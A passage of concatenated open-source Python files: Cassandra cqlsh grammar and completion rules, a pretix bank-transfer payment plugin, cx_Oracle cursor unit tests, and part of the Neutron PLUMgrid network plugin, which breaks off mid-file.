<dropUserTypeStatement> ::= "DROP" "TYPE" ut=<userTypeName>
;
<dropFunctionStatement> ::= "DROP" "FUNCTION" ( "IF" "EXISTS" )? <userFunctionName>
;
<dropAggregateStatement> ::= "DROP" "AGGREGATE" ( "IF" "EXISTS" )? <userAggregateName>
;
'''
@completer_for('indexName', 'ksname')
def idx_ks_name_completer(ctxt, cass):
return [maybe_escape_name(ks) + '.' for ks in cass.get_keyspace_names()]
@completer_for('indexName', 'dot')
def idx_ks_dot_completer(ctxt, cass):
name = dequote_name(ctxt.get_binding('ksname'))
if name in cass.get_keyspace_names():
return ['.']
return []
@completer_for('indexName', 'idxname')
def idx_ks_idx_name_completer(ctxt, cass):
ks = ctxt.get_binding('ksname', None)
if ks is not None:
ks = dequote_name(ks)
try:
idxnames = cass.get_index_names(ks)
except Exception:
if ks is None:
return ()
raise
return map(maybe_escape_name, idxnames)
syntax_rules += r'''
<alterTableStatement> ::= "ALTER" wat=( "COLUMNFAMILY" | "TABLE" ) cf=<columnFamilyName>
<alterInstructions>
;
<alterInstructions> ::= "ALTER" existcol=<cident> "TYPE" <storageType>
| "ADD" newcol=<cident> <storageType> ("static")?
| "DROP" existcol=<cident>
| "WITH" <cfamProperty> ( "AND" <cfamProperty> )*
| "RENAME" existcol=<cident> "TO" newcol=<cident>
( "AND" existcol=<cident> "TO" newcol=<cident> )*
;
<alterUserTypeStatement> ::= "ALTER" "TYPE" ut=<userTypeName>
<alterTypeInstructions>
;
<alterTypeInstructions> ::= "ALTER" existcol=<cident> "TYPE" <storageType>
| "ADD" newcol=<cident> <storageType>
| "RENAME" existcol=<cident> "TO" newcol=<cident>
( "AND" existcol=<cident> "TO" newcol=<cident> )*
;
'''
@completer_for('alterInstructions', 'existcol')
def alter_table_col_completer(ctxt, cass):
layout = get_table_meta(ctxt, cass)
cols = [str(md) for md in layout.columns]
return map(maybe_escape_name, cols)
@completer_for('alterTypeInstructions', 'existcol')
def alter_type_field_completer(ctxt, cass):
layout = get_ut_layout(ctxt, cass)
fields = [tuple[0] for tuple in layout]
return map(maybe_escape_name, fields)
explain_completion('alterInstructions', 'newcol', '<new_column_name>')
explain_completion('alterTypeInstructions', 'newcol', '<new_field_name>')
syntax_rules += r'''
<alterKeyspaceStatement> ::= "ALTER" wat=( "KEYSPACE" | "SCHEMA" ) ks=<alterableKeyspaceName>
"WITH" <property> ( "AND" <property> )*
;
'''
syntax_rules += r'''
<username> ::= name=( <identifier> | <stringLiteral> )
;
<createUserStatement> ::= "CREATE" "USER" ( "IF" "NOT" "EXISTS" )? <username>
( "WITH" "PASSWORD" <stringLiteral> )?
( "SUPERUSER" | "NOSUPERUSER" )?
;
<alterUserStatement> ::= "ALTER" "USER" <username>
( "WITH" "PASSWORD" <stringLiteral> )?
( "SUPERUSER" | "NOSUPERUSER" )?
;
<dropUserStatement> ::= "DROP" "USER" ( "IF" "EXISTS" )? <username>
;
<listUsersStatement> ::= "LIST" "USERS"
;
'''
syntax_rules += r'''
<rolename> ::= <identifier>
| <quotedName>
| <unreservedKeyword>
;
<createRoleStatement> ::= "CREATE" "ROLE" <rolename>
( "WITH" <roleProperty> ("AND" <roleProperty>)*)?
;
<alterRoleStatement> ::= "ALTER" "ROLE" <rolename>
( "WITH" <roleProperty> ("AND" <roleProperty>)*)?
;
<roleProperty> ::= "PASSWORD" "=" <stringLiteral>
| "OPTIONS" "=" <mapLiteral>
| "SUPERUSER" "=" <boolean>
| "LOGIN" "=" <boolean>
;
<dropRoleStatement> ::= "DROP" "ROLE" <rolename>
;
<grantRoleStatement> ::= "GRANT" <rolename> "TO" <rolename>
;
<revokeRoleStatement> ::= "REVOKE" <rolename> "FROM" <rolename>
;
<listRolesStatement> ::= "LIST" "ROLES"
( "OF" <rolename> )? "NORECURSIVE"?
;
'''
syntax_rules += r'''
<grantStatement> ::= "GRANT" <permissionExpr> "ON" <resource> "TO" <rolename>
;
<revokeStatement> ::= "REVOKE" <permissionExpr> "ON" <resource> "FROM" <rolename>
;
<listPermissionsStatement> ::= "LIST" <permissionExpr>
( "ON" <resource> )? ( "OF" <rolename> )? "NORECURSIVE"?
;
<permission> ::= "AUTHORIZE"
| "CREATE"
| "ALTER"
| "DROP"
| "SELECT"
| "MODIFY"
| "DESCRIBE"
| "EXECUTE"
;
<permissionExpr> ::= ( <permission> "PERMISSION"? )
| ( "ALL" "PERMISSIONS"? )
;
<resource> ::= <dataResource>
| <roleResource>
| <functionResource>
| <jmxResource>
;
<dataResource> ::= ( "ALL" "KEYSPACES" )
| ( "KEYSPACE" <keyspaceName> )
| ( "TABLE"? <columnFamilyName> )
;
<roleResource> ::= ("ALL" "ROLES")
| ("ROLE" <rolename>)
;
<functionResource> ::= ( "ALL" "FUNCTIONS" ("IN KEYSPACE" <keyspaceName>)? )
| ( "FUNCTION" <functionAggregateName>
( "(" ( newcol=<cident> <storageType>
( "," [newcolname]=<cident> <storageType> )* )?
")" )
)
;
<jmxResource> ::= ( "ALL" "MBEANS")
| ( ( "MBEAN" | "MBEANS" ) <stringLiteral> )
;
'''
@completer_for('username', 'name')
def username_name_completer(ctxt, cass):
def maybe_quote(name):
if CqlRuleSet.is_valid_cql3_name(name):
return name
return "'%s'" % name
# disable completion for CREATE USER.
if ctxt.matched[0][1].upper() == 'CREATE':
return [Hint('<username>')]
session = cass.session
return [maybe_quote(row.values()[0].replace("'", "''")) for row in session.execute("LIST USERS")]
@completer_for('rolename', 'role')
def rolename_completer(ctxt, cass):
def maybe_quote(name):
if CqlRuleSet.is_valid_cql3_name(name):
return name
return "'%s'" % name
# disable completion for CREATE ROLE.
if ctxt.matched[0][1].upper() == 'CREATE':
return [Hint('<rolename>')]
session = cass.session
return [maybe_quote(row[0].replace("'", "''")) for row in session.execute("LIST ROLES")]
syntax_rules += r'''
<createTriggerStatement> ::= "CREATE" "TRIGGER" ( "IF" "NOT" "EXISTS" )? <cident>
"ON" cf=<columnFamilyName> "USING" class=<stringLiteral>
;
<dropTriggerStatement> ::= "DROP" "TRIGGER" ( "IF" "EXISTS" )? triggername=<cident>
"ON" cf=<columnFamilyName>
;
'''
explain_completion('createTriggerStatement', 'class', '\'fully qualified class name\'')
def get_trigger_names(ctxt, cass):
ks = ctxt.get_binding('ksname', None)
if ks is not None:
ks = dequote_name(ks)
return cass.get_trigger_names(ks)
@completer_for('dropTriggerStatement', 'triggername')
def drop_trigger_completer(ctxt, cass):
names = get_trigger_names(ctxt, cass)
return map(maybe_escape_name, names)
# END SYNTAX/COMPLETION RULE DEFINITIONS
CqlRuleSet.append_rules(syntax_rules)
| mambocab/cassandra | pylib/cqlshlib/cql3handling.py | Python | apache-2.0 | 55,793 |
import json
from collections import OrderedDict
from django import forms
from django.template.loader import get_template
from django.utils.translation import ugettext_lazy as _
from pretix.base.payment import BasePaymentProvider
class BankTransfer(BasePaymentProvider):
identifier = 'banktransfer'
verbose_name = _('Bank transfer')
@property
def settings_form_fields(self):
return OrderedDict(
list(super().settings_form_fields.items()) + [
('bank_details',
forms.CharField(
widget=forms.Textarea,
label=_('Bank account details'),
))
]
)
def payment_form_render(self, request) -> str:
template = get_template('pretixplugins/banktransfer/checkout_payment_form.html')
ctx = {'request': request, 'event': self.event, 'settings': self.settings}
return template.render(ctx)
def checkout_prepare(self, request, total):
return True
def payment_is_valid_session(self, request):
return True
def checkout_confirm_render(self, request):
form = self.payment_form(request)
template = get_template('pretixplugins/banktransfer/checkout_payment_confirm.html')
ctx = {'request': request, 'form': form, 'settings': self.settings}
return template.render(ctx)
def order_pending_mail_render(self, order) -> str:
template = get_template('pretixplugins/banktransfer/email/order_pending.txt')
ctx = {'event': self.event, 'order': order, 'settings': self.settings}
return template.render(ctx)
def order_pending_render(self, request, order) -> str:
template = get_template('pretixplugins/banktransfer/pending.html')
ctx = {'request': request, 'order': order, 'settings': self.settings}
return template.render(ctx)
def order_control_render(self, request, order) -> str:
if order.payment_info:
payment_info = json.loads(order.payment_info)
else:
payment_info = None
template = get_template('pretixplugins/banktransfer/control.html')
ctx = {'request': request, 'event': self.event, 'settings': self.settings,
'payment_info': payment_info, 'order': order}
return template.render(ctx)
| akuks/pretix | src/pretix/plugins/banktransfer/payment.py | Python | apache-2.0 | 2,341 |
"""Module for testing cursor objects."""
import cx_Oracle
class TestCursor(BaseTestCase):
def testExecuteNoArgs(self):
"""test executing a statement without any arguments"""
result = self.cursor.execute(u"begin null; end;")
self.failUnlessEqual(result, None)
def testExecuteNoStatementWithArgs(self):
"""test executing a None statement with bind variables"""
self.failUnlessRaises(cx_Oracle.ProgrammingError, self.cursor.execute,
None, x = 5)
def testExecuteEmptyKeywordArgs(self):
"""test executing a statement with args and empty keyword args"""
simpleVar = self.cursor.var(cx_Oracle.NUMBER)
args = [simpleVar]
kwArgs = {}
result = self.cursor.execute(u"begin :1 := 25; end;", args, **kwArgs)
self.failUnlessEqual(result, None)
self.failUnlessEqual(simpleVar.getvalue(), 25)
def testExecuteKeywordArgs(self):
"""test executing a statement with keyword arguments"""
simpleVar = self.cursor.var(cx_Oracle.NUMBER)
result = self.cursor.execute(u"begin :value := 5; end;",
value = simpleVar)
self.failUnlessEqual(result, None)
self.failUnlessEqual(simpleVar.getvalue(), 5)
def testExecuteDictionaryArg(self):
"""test executing a statement with a dictionary argument"""
simpleVar = self.cursor.var(cx_Oracle.NUMBER)
dictArg = { u"value" : simpleVar }
result = self.cursor.execute(u"begin :value := 10; end;", dictArg)
self.failUnlessEqual(result, None)
self.failUnlessEqual(simpleVar.getvalue(), 10)
def testExecuteMultipleMethod(self):
"""test executing a statement with both a dict arg and keyword args"""
simpleVar = self.cursor.var(cx_Oracle.NUMBER)
dictArg = { u"value" : simpleVar }
self.failUnlessRaises(cx_Oracle.InterfaceError, self.cursor.execute,
u"begin :value := 15; end;", dictArg, value = simpleVar)
def testExecuteAndModifyArraySize(self):
"""test executing a statement and then changing the array size"""
self.cursor.execute(u"select IntCol from TestNumbers")
self.cursor.arraysize = 20
self.failUnlessEqual(len(self.cursor.fetchall()), 10)
def testCallProc(self):
"""test executing a stored procedure"""
var = self.cursor.var(cx_Oracle.NUMBER)
results = self.cursor.callproc(u"proc_Test", (u"hi", 5, var))
self.failUnlessEqual(results, [u"hi", 10, 2.0])
def testCallProcNoArgs(self):
"""test executing a stored procedure without any arguments"""
results = self.cursor.callproc(u"proc_TestNoArgs")
self.failUnlessEqual(results, [])
def testCallFunc(self):
"""test executing a stored function"""
results = self.cursor.callfunc(u"func_Test", cx_Oracle.NUMBER,
(u"hi", 5))
self.failUnlessEqual(results, 7)
def testCallFuncNoArgs(self):
"""test executing a stored function without any arguments"""
results = self.cursor.callfunc(u"func_TestNoArgs", cx_Oracle.NUMBER)
self.failUnlessEqual(results, 712)
def testExecuteManyByName(self):
"""test executing a statement multiple times (named args)"""
self.cursor.execute(u"truncate table TestExecuteMany")
rows = [ { u"value" : n } for n in range(250) ]
self.cursor.arraysize = 100
statement = u"insert into TestExecuteMany (IntCol) values (:value)"
self.cursor.executemany(statement, rows)
self.connection.commit()
self.cursor.execute(u"select count(*) from TestExecuteMany")
count, = self.cursor.fetchone()
self.failUnlessEqual(count, len(rows))
def testExecuteManyByPosition(self):
"""test executing a statement multiple times (positional args)"""
self.cursor.execute(u"truncate table TestExecuteMany")
rows = [ [n] for n in range(230) ]
self.cursor.arraysize = 100
statement = u"insert into TestExecuteMany (IntCol) values (:1)"
self.cursor.executemany(statement, rows)
self.connection.commit()
self.cursor.execute(u"select count(*) from TestExecuteMany")
count, = self.cursor.fetchone()
self.failUnlessEqual(count, len(rows))
def testExecuteManyWithPrepare(self):
"""test executing a statement multiple times (with prepare)"""
self.cursor.execute(u"truncate table TestExecuteMany")
rows = [ [n] for n in range(225) ]
self.cursor.arraysize = 100
statement = u"insert into TestExecuteMany (IntCol) values (:1)"
self.cursor.prepare(statement)
self.cursor.executemany(None, rows)
self.connection.commit()
self.cursor.execute(u"select count(*) from TestExecuteMany")
count, = self.cursor.fetchone()
self.failUnlessEqual(count, len(rows))
def testExecuteManyWithRebind(self):
"""test executing a statement multiple times (with rebind)"""
self.cursor.execute(u"truncate table TestExecuteMany")
rows = [ [n] for n in range(235) ]
self.cursor.arraysize = 100
statement = u"insert into TestExecuteMany (IntCol) values (:1)"
self.cursor.executemany(statement, rows[:50])
self.cursor.executemany(statement, rows[50:])
self.connection.commit()
self.cursor.execute(u"select count(*) from TestExecuteMany")
count, = self.cursor.fetchone()
self.failUnlessEqual(count, len(rows))
def testExecuteManyWithExecption(self):
"""test executing a statement multiple times (with exception)"""
self.cursor.execute(u"truncate table TestExecuteMany")
rows = [ { u"value" : n } for n in (1, 2, 3, 2, 5) ]
statement = u"insert into TestExecuteMany (IntCol) values (:value)"
self.failUnlessRaises(cx_Oracle.DatabaseError, self.cursor.executemany,
statement, rows)
self.failUnlessEqual(self.cursor.rowcount, 3)
def testPrepare(self):
"""test preparing a statement and executing it multiple times"""
self.failUnlessEqual(self.cursor.statement, None)
statement = u"begin :value := :value + 5; end;"
self.cursor.prepare(statement)
var = self.cursor.var(cx_Oracle.NUMBER)
self.failUnlessEqual(self.cursor.statement, statement)
var.setvalue(0, 2)
self.cursor.execute(None, value = var)
self.failUnlessEqual(var.getvalue(), 7)
self.cursor.execute(None, value = var)
self.failUnlessEqual(var.getvalue(), 12)
self.cursor.execute(u"begin :value2 := 3; end;", value2 = var)
self.failUnlessEqual(var.getvalue(), 3)
def testExceptionOnClose(self):
"confirm an exception is raised after closing a cursor"
self.cursor.close()
self.failUnlessRaises(cx_Oracle.InterfaceError, self.cursor.execute,
u"select 1 from dual")
def testIterators(self):
"""test iterators"""
self.cursor.execute(u"""
select IntCol
from TestNumbers
where IntCol between 1 and 3
order by IntCol""")
rows = []
for row in self.cursor:
rows.append(row[0])
self.failUnlessEqual(rows, [1, 2, 3])
def testIteratorsInterrupted(self):
"""test iterators (with intermediate execute)"""
self.cursor.execute(u"truncate table TestExecuteMany")
self.cursor.execute(u"""
select IntCol
from TestNumbers
where IntCol between 1 and 3
order by IntCol""")
testIter = iter(self.cursor)
value, = testIter.next()
self.cursor.execute(u"insert into TestExecuteMany (IntCol) values (1)")
self.failUnlessRaises(cx_Oracle.InterfaceError, testIter.next)
def testBindNames(self):
"""test that bindnames() works correctly."""
self.failUnlessRaises(cx_Oracle.ProgrammingError,
self.cursor.bindnames)
self.cursor.prepare(u"begin null; end;")
self.failUnlessEqual(self.cursor.bindnames(), [])
self.cursor.prepare(u"begin :retval := :inval + 5; end;")
self.failUnlessEqual(self.cursor.bindnames(), ["RETVAL", "INVAL"])
self.cursor.prepare(u"begin :retval := :a * :a + :b * :b; end;")
self.failUnlessEqual(self.cursor.bindnames(), ["RETVAL", "A", "B"])
self.cursor.prepare(u"begin :a := :b + :c + :d + :e + :f + :g + " + \
":h + :i + :j + :k + :l; end;")
self.failUnlessEqual(self.cursor.bindnames(),
[u"A", u"B", u"C", u"D", u"E", u"F", u"G", u"H", u"I", u"J",
u"K", u"L"])
def testBadPrepare(self):
"""test that subsequent executes succeed after bad prepare"""
self.failUnlessRaises(cx_Oracle.DatabaseError,
self.cursor.execute,
u"begin raise_application_error(-20000, 'this); end;")
self.cursor.execute(u"begin null; end;")
def testBadExecute(self):
"""test that subsequent fetches fail after bad execute"""
self.failUnlessRaises(cx_Oracle.DatabaseError,
self.cursor.execute, u"select y from dual")
self.failUnlessRaises(cx_Oracle.InterfaceError,
self.cursor.fetchall)
def testSetInputSizesMultipleMethod(self):
"""test setting input sizes with both positional and keyword args"""
self.failUnlessRaises(cx_Oracle.InterfaceError,
self.cursor.setinputsizes, 5, x = 5)
def testSetInputSizesByPosition(self):
"""test setting input sizes with positional args"""
var = self.cursor.var(cx_Oracle.STRING, 100)
self.cursor.setinputsizes(None, 5, None, 10, None, cx_Oracle.NUMBER)
self.cursor.execute(u"""
begin
:1 := :2 || to_char(:3) || :4 || to_char(:5) || to_char(:6);
end;""", [var, u'test_', 5, u'_second_', 3, 7])
self.failUnlessEqual(var.getvalue(), u"test_5_second_37")
| jayceyxc/hue | desktop/core/ext-py/cx_Oracle-5.2.1/test/uCursor.py | Python | apache-2.0 | 10,123 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 PLUMgrid, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Edgar Magana, emagana@plumgrid.com, PLUMgrid, Inc.
"""
Neutron Plug-in for PLUMgrid Virtual Networking Infrastructure (VNI)
This plugin will forward authenticated REST API calls
to the PLUMgrid Network Management System called Director
"""
import netaddr
from oslo.config import cfg
from sqlalchemy.orm import exc as sa_exc
from neutron.api.v2 import attributes
from neutron.common import constants
from neutron.db import db_base_plugin_v2
from neutron.db import external_net_db
from neutron.db import l3_db
from neutron.db import portbindings_db
from neutron.db import quota_db # noqa
from neutron.extensions import portbindings
from neutron.openstack.common import importutils
from neutron.openstack.common import log as logging
from neutron.plugins.plumgrid.common import exceptions as plum_excep
from neutron.plugins.plumgrid.plumgrid_plugin import plugin_ver
LOG = logging.getLogger(__name__)
director_server_opts = [
cfg.StrOpt('director_server', default='localhost',
help=_("PLUMgrid Director server to connect to")),
cfg.StrOpt('director_server_port', default='8080',
help=_("PLUMgrid Director server port to connect to")),
cfg.StrOpt('username', default='username',
help=_("PLUMgrid Director admin username")),
cfg.StrOpt('password', default='password', secret=True,
help=_("PLUMgrid Director admin password")),
cfg.IntOpt('servertimeout', default=5,
help=_("PLUMgrid Director server timeout")),
cfg.StrOpt('driver',
default="neutron.plugins.plumgrid.drivers.plumlib.Plumlib",
help=_("PLUMgrid Driver")), ]
cfg.CONF.register_opts(director_server_opts, "plumgriddirector")
class NeutronPluginPLUMgridV2(db_base_plugin_v2.NeutronDbPluginV2,
portbindings_db.PortBindingMixin,
external_net_db.External_net_db_mixin,
l3_db.L3_NAT_db_mixin):
supported_extension_aliases = ["external-net", "router", "binding",
"quotas", "provider"]
binding_view = "extension:port_binding:view"
binding_set = "extension:port_binding:set"
def __init__(self):
LOG.info(_('Neutron PLUMgrid Director: Starting Plugin'))
super(NeutronPluginPLUMgridV2, self).__init__()
self.plumgrid_init()
LOG.debug(_('Neutron PLUMgrid Director: Neutron server with '
'PLUMgrid Plugin has started'))
def plumgrid_init(self):
"""PLUMgrid initialization."""
director_plumgrid = cfg.CONF.plumgriddirector.director_server
director_port = cfg.CONF.plumgriddirector.director_server_port
director_admin = cfg.CONF.plumgriddirector.username
director_password = cfg.CONF.plumgriddirector.password
timeout = cfg.CONF.plumgriddirector.servertimeout
plum_driver = cfg.CONF.plumgriddirector.driver
# PLUMgrid Director info validation
LOG.info(_('Neutron PLUMgrid Director: %s'), director_plumgrid)
self._plumlib = importutils.import_object(plum_driver)
self._plumlib.director_conn(director_plumgrid, director_port, timeout,
director_admin, director_password)
def create_network(self, context, network):
"""Create Neutron network.
Creates a PLUMgrid-based bridge.
"""
LOG.debug(_('Neutron PLUMgrid Director: create_network() called'))
# Plugin DB - Network Create and validation
tenant_id = self._get_tenant_id_for_create(context,
network["network"])
self._network_admin_state(network)
with context.session.begin(subtransactions=True):
net_db = super(NeutronPluginPLUMgridV2,
self).create_network(context, network)
# Propagate all L3 data into DB
self._process_l3_create(context, net_db, network['network'])
try:
LOG.debug(_('PLUMgrid Library: create_network() called'))
self._plumlib.create_network(tenant_id, net_db, network)
except Exception as err_message:
raise plum_excep.PLUMgridException(err_msg=err_message)
# Return created network
return net_db
def update_network(self, context, net_id, network):
"""Update Neutron network.
Updates a PLUMgrid-based bridge.
"""
LOG.debug(_("Neutron PLUMgrid Director: update_network() called"))
self._network_admin_state(network)
tenant_id = self._get_tenant_id_for_create(context, network["network"])
with context.session.begin(subtransactions=True):
# Plugin DB - Network Update
net_db = super(
NeutronPluginPLUMgridV2, self).update_network(context,
net_id, network)
self._process_l3_update(context, net_db, network['network'])
try:
LOG.debug(_("PLUMgrid Library: update_network() called"))
self._plumlib.update_network(tenant_id, net_id)
except Exception as err_message:
raise plum_excep.PLUMgridException(err_msg=err_message)
# Return updated network
return net_db
def delete_network(self, context, net_id):
"""Delete Neutron network.
Deletes a PLUMgrid-based bridge.
"""
LOG.debug(_("Neutron PLUMgrid Director: delete_network() called"))
net_db = super(NeutronPluginPLUMgridV2,
self).get_network(context, net_id)
with context.session.begin(subtransactions=True):
self._process_l3_delete(context, net_id)
# Plugin DB - Network Delete
super(NeutronPluginPLUMgridV2, self).delete_network(context,
net_id)
try:
LOG.debug(_("PLUMgrid Library: update_network() called"))
self._plumlib.delete_network(net_db, net_id)
except Exception as err_message:
raise plum_excep.PLUMgridException(err_msg=err_message)
def create_port(self, context, port):
"""Create Neutron port.
Creates a PLUMgrid-based port on the specific Virtual Network
Function (VNF).
"""
LOG.debug(_("Neutron PLUMgrid Director: create_port() called"))
# Port operations on PLUMgrid Director is an automatic operation
# from the VIF driver operations in Nova.
# It requires admin_state_up to be True
port["port"]["admin_state_up"] = True
with context.session.begin(subtransactions=True):
# Plugin DB - Port Create and Return port
port_db = super(NeutronPluginPLUMgridV2, self).create_port(context,
port)
device_id = port_db["device_id"]
if port_db["device_owner"] == constants.DEVICE_OWNER_ROUTER_GW:
router_db = self._get_router(context, device_id)
else:
router_db = None
try:
LOG.debug(_("PLUMgrid Library: create_port() called"))
self._plumlib.create_port(port_db, router_db)
except Exception as err_message:
raise plum_excep.PLUMgridException(err_msg=err_message)
# Plugin DB - Port Create and Return port
return self._port_viftype_binding(context, port_db)
def update_port(self, context, port_id, port):
"""Update Neutron port.
Updates a PLUMgrid-based port on the specific Virtual Network
Function (VNF).
"""
LOG.debug(_("Neutron PLUMgrid Director: update_port() called"))
with context.session.begin(subtransactions=True):
# Plugin DB - Port Create and Return port
port_db = super(NeutronPluginPLUMgridV2, self).update_port(
context, port_id, port)
device_id = port_db["device_id"]
if port_db["device_owner"] == constants.DEVICE_OWNER_ROUTER_GW:
router_db = self._get_router(context, device_id)
else:
router_db = None
try:
LOG.debug(_("PLUMgrid Library: create_port() called"))
self._plumlib.update_port(port_db, router_db)
except Exception as err_message:
raise plum_excep.PLUMgridException(err_msg=err_message)
# Plugin DB - Port Update
return self._port_viftype_binding(context, port_db)
def delete_port(self, context, port_id, l3_port_check=True):
"""Delete Neutron port.
Deletes a PLUMgrid-based port on the specific Virtual Network
Function (VNF).
"""
LOG.debug(_("Neutron PLUMgrid Director: delete_port() called"))
with context.session.begin(subtransactions=True):
# Plugin DB - Port Create and Return port
port_db = super(NeutronPluginPLUMgridV2,
self).get_port(context, port_id)
self.disassociate_floatingips(context, port_id)
super(NeutronPluginPLUMgridV2, self).delete_port(context, port_id)
if port_db["device_owner"] == constants.DEVICE_OWNER_ROUTER_GW:
device_id = port_db["device_id"]
router_db = self._get_router(context, device_id)
else:
router_db = None
try:
LOG.debug(_("PLUMgrid Library: delete_port() called"))
self._plumlib.delete_port(port_db, router_db)
except Exception as err_message:
raise plum_excep.PLUMgridException(err_msg=err_message)
def get_port(self, context, id, fields=None):
with context.session.begin(subtransactions=True):
port_db = super(NeutronPluginPLUMgridV2,
self).get_port(context, id, fields)
self._port_viftype_binding(context, port_db)
return self._fields(port_db, fields)
def get_ports(self, context, filters=None, fields=None):
with context.session.begin(subtransactions=True):
ports_db = super(NeutronPluginPLUMgridV2,
self).get_ports(context, filters, fields)
for port_db in ports_db:
self._port_viftype_binding(context, port_db)
return [self._fields(port, fields) for port in ports_db]
def create_subnet(self, context, subnet):
"""Create Neutron subnet.
Creates a PLUMgrid-based DHCP and NAT Virtual Network
Functions (VNFs).
"""
LOG.debug(_("Neutron PLUMgrid Director: create_subnet() called"))
with context.session.begin(subtransactions=True):
# Plugin DB - Subnet Create
net_db = super(NeutronPluginPLUMgridV2, self).get_network(
context, subnet['subnet']['network_id'], fields=None)
s = subnet['subnet']
ipnet = netaddr.IPNetwork(s['cidr'])
# PLUMgrid Director reserves the last IP address for GW
# when is not defined
if s['gateway_ip'] is attributes.ATTR_NOT_SPECIFIED:
gw_ip = str(netaddr.IPAddress(ipnet.last - 1))
subnet['subnet']['gateway_ip'] = gw_ip
# PLUMgrid reserves the first IP
if s['allocation_pools'] == attributes.ATTR_NOT_SPECIFIED:
allocation_pool = self._allocate_pools_for_subnet(context, s)
subnet['subnet']['allocation_pools'] = allocation_pool
sub_db = super(NeutronPluginPLUMgridV2, self).create_subnet(
context, subnet)
try:
LOG.debug(_("PLUMgrid Library: create_subnet() called"))
self._plumlib.create_subnet(sub_db, net_db, ipnet)
except Exception as err_message:
raise plum_excep.PLUMgridException(err_msg=err_message)
return sub_db
def delete_subnet(self, context, subnet_id):
"""Delete subnet core Neutron API."""
LOG.debug(_("Neutron PLUMgrid Director: delete_subnet() called"))
# Collecting subnet info
sub_db = self._get_subnet(context, subnet_id)
tenant_id = self._get_tenant_id_for_create(context, subnet_id)
net_id = sub_db["network_id"]
net_db = self.get_network(context, net_id)
with context.session.begin(subtransactions=True):
# Plugin DB - Subnet Delete
super(NeutronPluginPLUMgridV2, self).delete_subnet(
context, subnet_id)
try:
LOG.debug(_("PLUMgrid Library: delete_subnet() called"))
self._plumlib.delete_subnet(tenant_id, net_db, net_id)
except Exception as err_message:
raise plum_excep.PLUMgridException(err_msg=err_message)
def update_subnet(self, context, subnet_id, subnet):
"""Update subnet core Neutron API."""
LOG.debug(_("update_subnet() called"))
# Collecting subnet info
orig_sub_db = self._get_subnet(context, subnet_id)
with context.session.begin(subtransactions=True):
# Plugin DB - Subnet Update
new_sub_db = super(NeutronPluginPLUMgridV2,
self).update_subnet(context, subnet_id, subnet)
ipnet = netaddr.IPNetwork(new_sub_db['cidr'])
try:
# PLUMgrid Server does not support updating resources yet
LOG.debug(_("PLUMgrid Library: update_network() called"))
self._plumlib.update_subnet(orig_sub_db, new_sub_db, ipnet)
except Exception as err_message:
raise plum_excep.PLUMgridException(err_msg=err_message)
return new_sub_db
def create_router(self, context, router):
"""
Create router extension Neutron API
"""
LOG.debug(_("Neutron PLUMgrid Director: create_router() called"))
tenant_id = self._get_tenant_id_for_create(context, router["router"])
with context.session.begin(subtransactions=True):
# Create router in DB
router_db = super(NeutronPluginPLUMgridV2,
self).create_router(context, router)
# Create router on the network controller
try:
# Add Router to VND
LOG.debug(_("PLUMgrid Library: create_router() called"))
self._plumlib.create_router(tenant_id, router_db)
except Exception as err_message:
raise plum_excep.PLUMgridException(err_msg=err_message)
# Return created router
return router_db
def update_router(self, context, router_id, router):
LOG.debug(_("Neutron PLUMgrid Director: update_router() called"))
with context.session.begin(subtransactions=True):
router_db = super(NeutronPluginPLUMgridV2,
self).update_router(context, router_id, router)
try:
LOG.debug(_("PLUMgrid Library: update_router() called"))
self._plumlib.update_router(router_db, router_id)
except Exception as err_message:
raise plum_excep.PLUMgridException(err_msg=err_message)
# Return updated router
return router_db
def delete_router(self, context, router_id):
LOG.debug(_("Neutron PLUMgrid Director: delete_router() called"))
with context.session.begin(subtransactions=True):
orig_router = self._get_router(context, router_id)
tenant_id = orig_router["tenant_id"]
super(NeutronPluginPLUMgridV2, self).delete_router(context,
router_id)
try:
LOG.debug(_("PLUMgrid Library: delete_router() called"))
self._plumlib.delete_router(tenant_id, router_id)
except Exception as err_message:
raise plum_excep.PLUMgridException(err_msg=err_message)
def add_router_interface(self, context, router_id, interface_info):
LOG.debug(_("Neutron PLUMgrid Director: "
"add_router_interface() called"))
with context.session.begin(subtransactions=True):
# Validate args
router_db = self._get_router(context, router_id)
tenant_id = router_db['tenant_id']
# Create interface in DB
int_router = super(NeutronPluginPLUMgridV2,
self).add_router_interface(context,
router_id,
interface_info)
port_db = self._get_port(context, int_router['port_id'])
subnet_id = port_db["fixed_ips"][0]["subnet_id"]
subnet_db = super(NeutronPluginPLUMgridV2,
self)._get_subnet(context, subnet_id)
ipnet = netaddr.IPNetwork(subnet_db['cidr'])
# Create interface on the network controller
try:
LOG.debug(_("PLUMgrid Library: add_router_interface() called"))
self._plumlib.add_router_interface(tenant_id, router_id,
port_db, ipnet)
except Exception as err_message:
raise plum_excep.PLUMgridException(err_msg=err_message)
return int_router
def remove_router_interface(self, context, router_id, int_info):
LOG.debug(_("Neutron PLUMgrid Director: "
"remove_router_interface() called"))
with context.session.begin(subtransactions=True):
# Validate args
router_db = self._get_router(context, router_id)
tenant_id = router_db['tenant_id']
if 'port_id' in int_info:
port = self._get_port(context, int_info['port_id'])
net_id = port['network_id']
elif 'subnet_id' in int_info:
subnet_id = int_info['subnet_id']
subnet = self._get_subnet(context, subnet_id)
net_id = subnet['network_id']
# Remove router in DB
del_int_router = super(NeutronPluginPLUMgridV2,
self).remove_router_interface(context,
router_id,
int_info)
try:
LOG.debug(_("PLUMgrid Library: "
"remove_router_interface() called"))
self._plumlib.remove_router_interface(tenant_id,
net_id, router_id)
except Exception as err_message:
raise plum_excep.PLUMgridException(err_msg=err_message)
return del_int_router
def create_floatingip(self, context, floatingip):
LOG.debug(_("Neutron PLUMgrid Director: create_floatingip() called"))
with context.session.begin(subtransactions=True):
floating_ip = super(NeutronPluginPLUMgridV2,
self).create_floatingip(context, floatingip)
try:
LOG.debug(_("PLUMgrid Library: create_floatingip() called"))
self._plumlib.create_floatingip(floating_ip)
except Exception as err_message:
raise plum_excep.PLUMgridException(err_msg=err_message)
return floating_ip
def update_floatingip(self, context, id, floatingip):
LOG.debug(_("Neutron PLUMgrid Director: update_floatingip() called"))
